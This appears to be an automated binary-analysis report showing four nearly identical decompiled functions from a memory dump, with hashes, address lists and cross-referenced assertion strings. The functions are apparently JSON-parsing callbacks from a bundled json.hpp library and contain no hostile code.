String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: 03aba1ab89b2959cb4bb393f46e982deb2d229a46ceaed0179713c1ae9eb565a
Instruction ID: 3629e2486070bb40b9b5467b420ee37e589fb6b4edc6e25f0124d4b36c796b47
Opcode Fuzzy Hash: 03aba1ab89b2959cb4bb393f46e982deb2d229a46ceaed0179713c1ae9eb565a
Instruction Fuzzy Hash: 5E51E231A106449FCB14EF65C886BAEBBA5FF55310F048058E80AAB2D6DF71ED54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E7D76, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E001E7D76(signed int* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int** _t54;
				signed int _t60;
				char* _t62;
				signed int _t64;
				signed int** _t66;
				signed int _t71;
				signed int* _t85;
				signed int _t95;
				void* _t96;
				signed int _t97;
				signed int _t103;
				void* _t115;
				signed int _t117;
				intOrPtr _t118;
				char* _t121;
				void* _t124;
				void* _t126;
				void* _t127;

				L00227790(0x229d57, _t124);
				_t127 = _t126 - 0x1c;
				_t85 = __ecx;
				_push(_t115);
				 *((intOrPtr*)(_t124 - 0x10)) = __ecx;
				_t120 = L"A:\\_Work\\rc-build-v1-exe\\json.hpp";
				_t131 =  *((intOrPtr*)(__ecx + 0x1c));
				if( *((intOrPtr*)(__ecx + 0x1c)) == 0) {
					_push(0x1240);
					E0020F0F9(__ecx, __edx, _t115, L"A:\\_Work\\rc-build-v1-exe\\json.hpp", _t131, L"not keep_stack.empty()", L"A:\\_Work\\rc-build-v1-exe\\json.hpp");
					_t127 = _t127 + 0xc;
				}
				_t54 = E001E6AE0( &(_t85[4]), _t124 - 0x18);
				_t114 = 1 << _t54[1];
				if(( *( *_t54) & 1 << _t54[1]) != 0) {
					E001E7D37(_t124 - 0x28,  *((intOrPtr*)(_t124 + 0xc)));
					 *(_t124 - 4) =  *(_t124 - 4) & 0x00000000;
					_push(_t124 - 0x28);
					_t60 = E001E6C45(_t85,  &(_t85[0xe]), _t115, _t85[2] - _t85[1] >> 2, 5);
					__eflags = _t60;
					if(_t60 == 0) {
						L20:
						_t121 =  *((intOrPtr*)(_t124 + 8));
						_t47 = _t121 + 4;
						 *_t47 =  *(_t121 + 4) & 0x00000000;
						__eflags =  *_t47;
						 *_t121 = 0;
						L21:
						E001E3876(_t85, _t124 - 0x28, _t114);
						_t62 = _t121;
						goto L22;
					}
					__eflags = _t85[1] - _t85[2];
					if(_t85[1] != _t85[2]) {
						_t64 = _t85[2];
						_t95 =  *(_t64 - 4);
						__eflags = _t95;
						if(_t95 == 0) {
							goto L20;
						}
						_t96 =  *_t95;
						__eflags = _t96 - 2;
						if(_t96 != 2) {
							__eflags = _t96 - 1;
							if(__eflags != 0) {
								_push(0x1263);
								E0020F0F9(_t85, _t114, _t115, _t120, __eflags, L"ref_stack.back()->is_array() or ref_stack.back()->is_object()", _t120);
								_t64 = _t85[2];
								_t127 = _t127 + 0xc;
							}
						}
						_t97 =  *(_t64 - 4);
						__eflags =  *_t97 - 2;
						if( *_t97 != 2) {
							__eflags = _t85[0xb];
							if(__eflags == 0) {
								_push(0x126d);
								E0020F0F9(_t85, _t114, _t115, _t120, __eflags, L"not key_keep_stack.empty()", _t120);
								_t127 = _t127 + 0xc;
							}
							_t66 = E001E6AE0( &(_t85[8]), _t124 - 0x18);
							_t123 = _t66[1];
							_t117 =  *( *_t66);
							E001E6A89(_t85,  &(_t85[8]));
							_t71 = 1 << _t66[1];
							__eflags = _t117 & _t71;
							if((_t117 & _t71) == 0) {
								goto L20;
							} else {
								_t118 =  *((intOrPtr*)(_t124 - 0x10));
								__eflags =  *(_t118 + 0x30);
								if(__eflags == 0) {
									_push(0x1276);
									E0020F0F9(_t85, _t114, _t118, _t123, __eflags, L"object_element", L"A:\\_Work\\rc-build-v1-exe\\json.hpp");
									_t127 = _t127 + 0xc;
								}
								E001E3BE4(_t127 - 0x10, _t124 - 0x28);
								E001E4373(_t85,  *(_t118 + 0x30));
								_t103 =  *(_t118 + 0x30);
								goto L7;
							}
						} else {
							E001E8AF8(_t85,  *((intOrPtr*)(_t97 + 8)), _t115, _t124 - 0x28);
							_t103 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85[2] - 4)) + 8)) + 4)) - 0x10;
							L7:
							_t121 =  *((intOrPtr*)(_t124 + 8));
							 *_t121 = 1;
							 *(_t121 + 4) = _t103;
							goto L21;
						}
					}
					E001E3BE4(_t127 - 0x10, _t124 - 0x28);
					E001E4373(_t85,  *_t85);
					_t103 =  *_t85;
					goto L7;
				} else {
					_t62 =  *((intOrPtr*)(_t124 + 8));
					 *(_t62 + 4) =  *(_t62 + 4) & 0x00000000;
					 *_t62 = 0;
					L22:
					 *[fs:0x0] =  *((intOrPtr*)(_t124 - 0xc));
					return _t62;
				}
			}

0x001e7d7b
0x001e7d80
0x001e7d84
0x001e7d87
0x001e7d88
0x001e7d8b
0x001e7d90
0x001e7d94
0x001e7d96
0x001e7da1
0x001e7da6
0x001e7da6
0x001e7db0
0x001e7dbd
0x001e7dc1
0x001e7dd8
0x001e7ddd
0x001e7dea
0x001e7df4
0x001e7df9
0x001e7dfb
0x001e7f00
0x001e7f00
0x001e7f03
0x001e7f03
0x001e7f03
0x001e7f07
0x001e7f0a
0x001e7f0d
0x001e7f12
0x00000000
0x001e7f12
0x001e7e04
0x001e7e07
0x001e7e2e
0x001e7e31
0x001e7e34
0x001e7e36
0x00000000
0x00000000
0x001e7e3c
0x001e7e3e
0x001e7e41
0x001e7e43
0x001e7e46
0x001e7e48
0x001e7e53
0x001e7e58
0x001e7e5b
0x001e7e5b
0x001e7e46
0x001e7e5e
0x001e7e61
0x001e7e64
0x001e7e83
0x001e7e87
0x001e7e89
0x001e7e94
0x001e7e99
0x001e7e99
0x001e7ea3
0x001e7eab
0x001e7eb0
0x001e7eb2
0x001e7ebc
0x001e7ebe
0x001e7ec0
0x00000000
0x001e7ec2
0x001e7ec2
0x001e7ec5
0x001e7ec9
0x001e7ecb
0x001e7eda
0x001e7edf
0x001e7edf
0x001e7eeb
0x001e7ef3
0x001e7ef8
0x00000000
0x001e7ef8
0x001e7e66
0x001e7e6d
0x001e7e7e
0x001e7e20
0x001e7e20
0x001e7e23
0x001e7e26
0x00000000
0x001e7e26
0x001e7e64
0x001e7e12
0x001e7e19
0x001e7e1e
0x00000000
0x001e7dc3
0x001e7dc3
0x001e7dc6
0x001e7dca
0x001e7f14
0x001e7f19
0x001e7f22
0x001e7f22

APIs

__EH_prolog.LIBCMT ref: 001E7D7B

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E7D8B, 001E7D9B, 001E7E4D, 001E7E8E, 001E7ED0
not keep_stack.empty(), xrefs: 001E7D9C
not key_keep_stack.empty(), xrefs: 001E7E8F
object_element, xrefs: 001E7ED5
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 001E7E4E

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: 6b9fcade7dc5771d9344f36e7ad07b8ea9f06f8d832922926bc23fb2f97056e7
Instruction ID: b17f0ad72960f4bec94ea65f8420be6983cdf3b4863c62d02417feab9b9385e0
Opcode Fuzzy Hash: 6b9fcade7dc5771d9344f36e7ad07b8ea9f06f8d832922926bc23fb2f97056e7
Instruction Fuzzy Hash: E9510231A046849FDB04EF65C886BAEBBB5FF55310F148098E805AF2D6DB71ED54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E85E3, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E001E85E3(signed int* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int** _t53;
				signed int _t59;
				char* _t61;
				signed int _t63;
				signed int** _t65;
				signed int _t70;
				signed int* _t84;
				signed int _t94;
				void* _t95;
				signed int _t96;
				signed int _t102;
				void* _t114;
				signed int _t116;
				intOrPtr _t117;
				char* _t120;
				void* _t123;
				void* _t125;
				void* _t126;

				L00227790(0x229d57, _t123);
				_t126 = _t125 - 0x1c;
				_t84 = __ecx;
				_push(_t114);
				 *((intOrPtr*)(_t123 - 0x10)) = __ecx;
				_t119 = L"A:\\_Work\\rc-build-v1-exe\\json.hpp";
				_t130 =  *((intOrPtr*)(__ecx + 0x1c));
				if( *((intOrPtr*)(__ecx + 0x1c)) == 0) {
					_push(0x1240);
					E0020F0F9(__ecx, __edx, _t114, L"A:\\_Work\\rc-build-v1-exe\\json.hpp", _t130, L"not keep_stack.empty()", L"A:\\_Work\\rc-build-v1-exe\\json.hpp");
					_t126 = _t126 + 0xc;
				}
				_t53 = E001E6AE0( &(_t84[4]), _t123 - 0x18);
				_t88 = _t53[1];
				_t113 = 1 << _t53[1];
				if(( *( *_t53) & 1 << _t53[1]) != 0) {
					E001E3C1E(_t123 - 0x28, _t88);
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_push(_t123 - 0x28);
					_t59 = E001E6C45(_t84,  &(_t84[0xe]), _t114, _t84[2] - _t84[1] >> 2, 5);
					__eflags = _t59;
					if(_t59 == 0) {
						L20:
						_t120 =  *((intOrPtr*)(_t123 + 8));
						_t46 = _t120 + 4;
						 *_t46 =  *(_t120 + 4) & 0x00000000;
						__eflags =  *_t46;
						 *_t120 = 0;
						L21:
						E001E3876(_t84, _t123 - 0x28, _t113);
						_t61 = _t120;
						goto L22;
					}
					__eflags = _t84[1] - _t84[2];
					if(_t84[1] != _t84[2]) {
						_t63 = _t84[2];
						_t94 =  *(_t63 - 4);
						__eflags = _t94;
						if(_t94 == 0) {
							goto L20;
						}
						_t95 =  *_t94;
						__eflags = _t95 - 2;
						if(_t95 != 2) {
							__eflags = _t95 - 1;
							if(__eflags != 0) {
								_push(0x1263);
								E0020F0F9(_t84, _t113, _t114, _t119, __eflags, L"ref_stack.back()->is_array() or ref_stack.back()->is_object()", _t119);
								_t63 = _t84[2];
								_t126 = _t126 + 0xc;
							}
						}
						_t96 =  *(_t63 - 4);
						__eflags =  *_t96 - 2;
						if( *_t96 != 2) {
							__eflags = _t84[0xb];
							if(__eflags == 0) {
								_push(0x126d);
								E0020F0F9(_t84, _t113, _t114, _t119, __eflags, L"not key_keep_stack.empty()", _t119);
								_t126 = _t126 + 0xc;
							}
							_t65 = E001E6AE0( &(_t84[8]), _t123 - 0x18);
							_t122 = _t65[1];
							_t116 =  *( *_t65);
							E001E6A89(_t84,  &(_t84[8]));
							_t70 = 1 << _t65[1];
							__eflags = _t116 & _t70;
							if((_t116 & _t70) == 0) {
								goto L20;
							} else {
								_t117 =  *((intOrPtr*)(_t123 - 0x10));
								__eflags =  *(_t117 + 0x30);
								if(__eflags == 0) {
									_push(0x1276);
									E0020F0F9(_t84, _t113, _t117, _t122, __eflags, L"object_element", L"A:\\_Work\\rc-build-v1-exe\\json.hpp");
									_t126 = _t126 + 0xc;
								}
								E001E3BE4(_t126 - 0x10, _t123 - 0x28);
								E001E4373(_t84,  *(_t117 + 0x30));
								_t102 =  *(_t117 + 0x30);
								goto L7;
							}
						} else {
							E001E8AF8(_t84,  *((intOrPtr*)(_t96 + 8)), _t114, _t123 - 0x28);
							_t102 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t84[2] - 4)) + 8)) + 4)) - 0x10;
							L7:
							_t120 =  *((intOrPtr*)(_t123 + 8));
							 *_t120 = 1;
							 *(_t120 + 4) = _t102;
							goto L21;
						}
					}
					E001E3BE4(_t126 - 0x10, _t123 - 0x28);
					E001E4373(_t84,  *_t84);
					_t102 =  *_t84;
					goto L7;
				} else {
					_t61 =  *((intOrPtr*)(_t123 + 8));
					 *(_t61 + 4) =  *(_t61 + 4) & 0x00000000;
					 *_t61 = 0;
					L22:
					 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0xc));
					return _t61;
				}
			}

0x001e85e8
0x001e85ed
0x001e85f1
0x001e85f4
0x001e85f5
0x001e85f8
0x001e85fd
0x001e8601
0x001e8603
0x001e860e
0x001e8613
0x001e8613
0x001e861d
0x001e8625
0x001e862a
0x001e862e
0x001e8643
0x001e8648
0x001e8655
0x001e865f
0x001e8664
0x001e8666
0x001e876b
0x001e876b
0x001e876e
0x001e876e
0x001e876e
0x001e8772
0x001e8775
0x001e8778
0x001e877d
0x00000000
0x001e877d
0x001e866f
0x001e8672
0x001e8699
0x001e869c
0x001e869f
0x001e86a1
0x00000000
0x00000000
0x001e86a7
0x001e86a9
0x001e86ac
0x001e86ae
0x001e86b1
0x001e86b3
0x001e86be
0x001e86c3
0x001e86c6
0x001e86c6
0x001e86b1
0x001e86c9
0x001e86cc
0x001e86cf
0x001e86ee
0x001e86f2
0x001e86f4
0x001e86ff
0x001e8704
0x001e8704
0x001e870e
0x001e8716
0x001e871b
0x001e871d
0x001e8727
0x001e8729
0x001e872b
0x00000000
0x001e872d
0x001e872d
0x001e8730
0x001e8734
0x001e8736
0x001e8745
0x001e874a
0x001e874a
0x001e8756
0x001e875e
0x001e8763
0x00000000
0x001e8763
0x001e86d1
0x001e86d8
0x001e86e9
0x001e868b
0x001e868b
0x001e868e
0x001e8691
0x00000000
0x001e8691
0x001e86cf
0x001e867d
0x001e8684
0x001e8689
0x00000000
0x001e8630
0x001e8630
0x001e8633
0x001e8637
0x001e877f
0x001e8784
0x001e878d
0x001e878d

APIs

__EH_prolog.LIBCMT ref: 001E85E8

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E85F8, 001E8608, 001E86B8, 001E86F9, 001E873B
not keep_stack.empty(), xrefs: 001E8609
not key_keep_stack.empty(), xrefs: 001E86FA
object_element, xrefs: 001E8740
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 001E86B9

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: 9f48ae4a101f05061f49b5c9ac5d998a721e893d5b3bc2695d0e8c51f65a763a
Instruction ID: 74139d72d4dcb6a4720741e17a8d4a116a3751ccc90d00bb6175013eb13f8fe0
Opcode Fuzzy Hash: 9f48ae4a101f05061f49b5c9ac5d998a721e893d5b3bc2695d0e8c51f65a763a
Instruction Fuzzy Hash: 54510431A10A409FCB18EF65C486FAEBBB5BF55310F144058E80AAF2D6DB71ED54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E7F27, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E001E7F27(signed int* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int** _t54;
				signed int _t60;
				char* _t62;
				signed int _t64;
				signed int** _t66;
				signed int _t71;
				signed int* _t85;
				signed int _t95;
				void* _t96;
				signed int _t97;
				signed int _t103;
				void* _t115;
				signed int _t117;
				intOrPtr _t118;
				char* _t121;
				void* _t124;
				void* _t126;
				void* _t127;

				L00227790(0x229d57, _t124);
				_t127 = _t126 - 0x1c;
				_t85 = __ecx;
				_push(_t115);
				 *((intOrPtr*)(_t124 - 0x10)) = __ecx;
				_t120 = L"A:\\_Work\\rc-build-v1-exe\\json.hpp";
				_t131 =  *((intOrPtr*)(__ecx + 0x1c));
				if( *((intOrPtr*)(__ecx + 0x1c)) == 0) {
					_push(0x1240);
					E0020F0F9(__ecx, __edx, _t115, L"A:\\_Work\\rc-build-v1-exe\\json.hpp", _t131, L"not keep_stack.empty()", L"A:\\_Work\\rc-build-v1-exe\\json.hpp");
					_t127 = _t127 + 0xc;
				}
				_t54 = E001E6AE0( &(_t85[4]), _t124 - 0x18);
				_t114 = 1 << _t54[1];
				if(( *( *_t54) & 1 << _t54[1]) != 0) {
					E001E8E70(_t124 - 0x28,  *((intOrPtr*)(_t124 + 0xc)));
					 *(_t124 - 4) =  *(_t124 - 4) & 0x00000000;
					_push(_t124 - 0x28);
					_t60 = E001E6C45(_t85,  &(_t85[0xe]), _t115, _t85[2] - _t85[1] >> 2, 5);
					__eflags = _t60;
					if(_t60 == 0) {
						L20:
						_t121 =  *((intOrPtr*)(_t124 + 8));
						_t47 = _t121 + 4;
						 *_t47 =  *(_t121 + 4) & 0x00000000;
						__eflags =  *_t47;
						 *_t121 = 0;
						L21:
						E001E3876(_t85, _t124 - 0x28, _t114);
						_t62 = _t121;
						goto L22;
					}
					__eflags = _t85[1] - _t85[2];
					if(_t85[1] != _t85[2]) {
						_t64 = _t85[2];
						_t95 =  *(_t64 - 4);
						__eflags = _t95;
						if(_t95 == 0) {
							goto L20;
						}
						_t96 =  *_t95;
						__eflags = _t96 - 2;
						if(_t96 != 2) {
							__eflags = _t96 - 1;
							if(__eflags != 0) {
								_push(0x1263);
								E0020F0F9(_t85, _t114, _t115, _t120, __eflags, L"ref_stack.back()->is_array() or ref_stack.back()->is_object()", _t120);
								_t64 = _t85[2];
								_t127 = _t127 + 0xc;
							}
						}
						_t97 =  *(_t64 - 4);
						__eflags =  *_t97 - 2;
						if( *_t97 != 2) {
							__eflags = _t85[0xb];
							if(__eflags == 0) {
								_push(0x126d);
								E0020F0F9(_t85, _t114, _t115, _t120, __eflags, L"not key_keep_stack.empty()", _t120);
								_t127 = _t127 + 0xc;
							}
							_t66 = E001E6AE0( &(_t85[8]), _t124 - 0x18);
							_t123 = _t66[1];
							_t117 =  *( *_t66);
							E001E6A89(_t85,  &(_t85[8]));
							_t71 = 1 << _t66[1];
							__eflags = _t117 & _t71;
							if((_t117 & _t71) == 0) {
								goto L20;
							} else {
								_t118 =  *((intOrPtr*)(_t124 - 0x10));
								__eflags =  *(_t118 + 0x30);
								if(__eflags == 0) {
									_push(0x1276);
									E0020F0F9(_t85, _t114, _t118, _t123, __eflags, L"object_element", L"A:\\_Work\\rc-build-v1-exe\\json.hpp");
									_t127 = _t127 + 0xc;
								}
								E001E3BE4(_t127 - 0x10, _t124 - 0x28);
								E001E4373(_t85,  *(_t118 + 0x30));
								_t103 =  *(_t118 + 0x30);
								goto L7;
							}
						} else {
							E001E8AF8(_t85,  *((intOrPtr*)(_t97 + 8)), _t115, _t124 - 0x28);
							_t103 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85[2] - 4)) + 8)) + 4)) - 0x10;
							L7:
							_t121 =  *((intOrPtr*)(_t124 + 8));
							 *_t121 = 1;
							 *(_t121 + 4) = _t103;
							goto L21;
						}
					}
					E001E3BE4(_t127 - 0x10, _t124 - 0x28);
					E001E4373(_t85,  *_t85);
					_t103 =  *_t85;
					goto L7;
				} else {
					_t62 =  *((intOrPtr*)(_t124 + 8));
					 *(_t62 + 4) =  *(_t62 + 4) & 0x00000000;
					 *_t62 = 0;
					L22:
					 *[fs:0x0] =  *((intOrPtr*)(_t124 - 0xc));
					return _t62;
				}
			}

0x001e7f2c
0x001e7f31
0x001e7f35
0x001e7f38
0x001e7f39
0x001e7f3c
0x001e7f41
0x001e7f45
0x001e7f47
0x001e7f52
0x001e7f57
0x001e7f57
0x001e7f61
0x001e7f6e
0x001e7f72
0x001e7f89
0x001e7f8e
0x001e7f9b
0x001e7fa5
0x001e7faa
0x001e7fac
0x001e80b1
0x001e80b1
0x001e80b4
0x001e80b4
0x001e80b4
0x001e80b8
0x001e80bb
0x001e80be
0x001e80c3
0x00000000
0x001e80c3
0x001e7fb5
0x001e7fb8
0x001e7fdf
0x001e7fe2
0x001e7fe5
0x001e7fe7
0x00000000
0x00000000
0x001e7fed
0x001e7fef
0x001e7ff2
0x001e7ff4
0x001e7ff7
0x001e7ff9
0x001e8004
0x001e8009
0x001e800c
0x001e800c
0x001e7ff7
0x001e800f
0x001e8012
0x001e8015
0x001e8034
0x001e8038
0x001e803a
0x001e8045
0x001e804a
0x001e804a
0x001e8054
0x001e805c
0x001e8061
0x001e8063
0x001e806d
0x001e806f
0x001e8071
0x00000000
0x001e8073
0x001e8073
0x001e8076
0x001e807a
0x001e807c
0x001e808b
0x001e8090
0x001e8090
0x001e809c
0x001e80a4
0x001e80a9
0x00000000
0x001e80a9
0x001e8017
0x001e801e
0x001e802f
0x001e7fd1
0x001e7fd1
0x001e7fd4
0x001e7fd7
0x00000000
0x001e7fd7
0x001e8015
0x001e7fc3
0x001e7fca
0x001e7fcf
0x00000000
0x001e7f74
0x001e7f74
0x001e7f77
0x001e7f7b
0x001e80c5
0x001e80ca
0x001e80d3
0x001e80d3

APIs

__EH_prolog.LIBCMT ref: 001E7F2C

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E7F3C, 001E7F4C, 001E7FFE, 001E803F, 001E8081
not keep_stack.empty(), xrefs: 001E7F4D
not key_keep_stack.empty(), xrefs: 001E8040
object_element, xrefs: 001E8086
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 001E7FFF

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: 5aa05c02ec3931fac3b08c92f818d904dec9c30f4a59275103f555c3bbde804c
Instruction ID: 2d3700b9d6b11c743865544aef9f715657a7b76e94159747c041d84f96a50b70
Opcode Fuzzy Hash: 5aa05c02ec3931fac3b08c92f818d904dec9c30f4a59275103f555c3bbde804c
Instruction Fuzzy Hash: 4151F331A00684DFCB14EF65C486BAEBBA5BF55310F048058F80AAF2D6DB71ED58CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001E7A9D, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E001E7A9D(signed int* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int** _t54;
				char _t57;
				signed int _t61;
				char* _t63;
				signed int** _t65;
				signed int _t70;
				signed int* _t84;
				signed int _t91;
				void* _t94;
				signed int _t95;
				signed int _t101;
				signed int _t112;
				void* _t113;
				signed int _t115;
				intOrPtr _t116;
				char* _t119;
				void* _t122;
				void* _t124;
				void* _t125;

				L00227790(0x229d57, _t122);
				_t125 = _t124 - 0x1c;
				_t84 = __ecx;
				_push(_t113);
				 *((intOrPtr*)(_t122 - 0x10)) = __ecx;
				_t118 = L"A:\\_Work\\rc-build-v1-exe\\json.hpp";
				_t129 =  *((intOrPtr*)(__ecx + 0x1c));
				if( *((intOrPtr*)(__ecx + 0x1c)) == 0) {
					_push(0x1240);
					E0020F0F9(__ecx, __edx, _t113, L"A:\\_Work\\rc-build-v1-exe\\json.hpp", _t129, L"not keep_stack.empty()", L"A:\\_Work\\rc-build-v1-exe\\json.hpp");
					_t125 = _t125 + 0xc;
				}
				_t54 = E001E6AE0( &(_t84[4]), _t122 - 0x18);
				_t112 = 1 << _t54[1];
				if(( *( *_t54) & 1) != 0) {
					_t57 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0xc))));
					 *((char*)(_t122 + 0xc)) = _t57;
					 *((char*)(_t122 - 0x28)) = _t57;
					E001E44E0(_t84, _t122 - 0x20, _t112,  *((intOrPtr*)(_t122 + 0xc)));
					E001E3C6A(_t122 - 0x28);
					 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
					__eflags = _t84[1] - _t84[2];
					if(_t84[1] != _t84[2]) {
						_t61 = _t84[2];
						_t91 =  *(_t61 - 4);
						__eflags = _t91;
						if(_t91 == 0) {
							L19:
							_t119 =  *((intOrPtr*)(_t122 + 8));
							_t47 = _t119 + 4;
							 *_t47 =  *(_t119 + 4) & 0x00000000;
							__eflags =  *_t47;
							 *_t119 = 0;
							L20:
							E001E3876(_t84, _t122 - 0x28, _t112);
							_t63 = _t119;
							goto L21;
						}
						_t94 =  *_t91;
						__eflags = _t94 - 2;
						if(_t94 != 2) {
							__eflags = _t94 - 1;
							if(__eflags != 0) {
								_push(0x1263);
								E0020F0F9(_t84, _t112, _t113, _t118, __eflags, L"ref_stack.back()->is_array() or ref_stack.back()->is_object()", _t118);
								_t61 = _t84[2];
								_t125 = _t125 + 0xc;
							}
						}
						_t95 =  *(_t61 - 4);
						__eflags =  *_t95 - 2;
						if( *_t95 != 2) {
							__eflags = _t84[0xb];
							if(__eflags == 0) {
								_push(0x126d);
								E0020F0F9(_t84, _t112, _t113, _t118, __eflags, L"not key_keep_stack.empty()", _t118);
								_t125 = _t125 + 0xc;
							}
							_t65 = E001E6AE0( &(_t84[8]), _t122 - 0x18);
							_t121 = _t65[1];
							_t115 =  *( *_t65);
							E001E6A89(_t84,  &(_t84[8]));
							_t70 = 1 << _t65[1];
							__eflags = _t115 & _t70;
							if((_t115 & _t70) == 0) {
								goto L19;
							} else {
								_t116 =  *((intOrPtr*)(_t122 - 0x10));
								__eflags =  *(_t116 + 0x30);
								if(__eflags == 0) {
									_push(0x1276);
									E0020F0F9(_t84, _t112, _t116, _t121, __eflags, L"object_element", L"A:\\_Work\\rc-build-v1-exe\\json.hpp");
									_t125 = _t125 + 0xc;
								}
								E001E3BE4(_t125 - 0x10, _t122 - 0x28);
								E001E4373(_t84,  *(_t116 + 0x30));
								_t101 =  *(_t116 + 0x30);
								goto L6;
							}
						} else {
							E001E8AF8(_t84,  *((intOrPtr*)(_t95 + 8)), _t113, _t122 - 0x28);
							_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t84[2] - 4)) + 8)) + 4)) - 0x10;
							L6:
							_t119 =  *((intOrPtr*)(_t122 + 8));
							 *_t119 = 1;
							 *(_t119 + 4) = _t101;
							goto L20;
						}
					}
					E001E3BE4(_t125 - 0x10, _t122 - 0x28);
					E001E4373(_t84,  *_t84);
					_t101 =  *_t84;
					goto L6;
				} else {
					_t63 =  *((intOrPtr*)(_t122 + 8));
					 *(_t63 + 4) =  *(_t63 + 4) & 0x00000000;
					 *_t63 = 0;
					L21:
					 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0xc));
					return _t63;
				}
			}

0x001e7aa2
0x001e7aa7
0x001e7aab
0x001e7aae
0x001e7aaf
0x001e7ab2
0x001e7ab7
0x001e7abb
0x001e7abd
0x001e7ac8
0x001e7acd
0x001e7acd
0x001e7ad7
0x001e7ae4
0x001e7ae8
0x001e7aff
0x001e7b01
0x001e7b07
0x001e7b0a
0x001e7b12
0x001e7b17
0x001e7b1e
0x001e7b21
0x001e7b48
0x001e7b4b
0x001e7b4e
0x001e7b50
0x001e7c1a
0x001e7c1a
0x001e7c1d
0x001e7c1d
0x001e7c1d
0x001e7c21
0x001e7c24
0x001e7c27
0x001e7c2c
0x00000000
0x001e7c2c
0x001e7b56
0x001e7b58
0x001e7b5b
0x001e7b5d
0x001e7b60
0x001e7b62
0x001e7b6d
0x001e7b72
0x001e7b75
0x001e7b75
0x001e7b60
0x001e7b78
0x001e7b7b
0x001e7b7e
0x001e7b9d
0x001e7ba1
0x001e7ba3
0x001e7bae
0x001e7bb3
0x001e7bb3
0x001e7bbd
0x001e7bc5
0x001e7bca
0x001e7bcc
0x001e7bd6
0x001e7bd8
0x001e7bda
0x00000000
0x001e7bdc
0x001e7bdc
0x001e7bdf
0x001e7be3
0x001e7be5
0x001e7bf4
